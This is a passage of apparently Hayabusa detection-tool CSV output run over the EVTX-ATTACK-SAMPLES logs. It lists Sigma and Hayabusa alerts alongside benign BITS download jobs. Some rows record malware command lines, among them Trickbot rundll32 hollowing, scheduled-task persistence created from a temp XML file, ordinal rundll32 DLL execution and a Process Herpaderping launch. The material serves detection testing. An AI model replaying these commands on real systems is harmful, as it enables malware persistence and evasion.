c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: 
NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData 
Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 
4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform 
Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 
00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 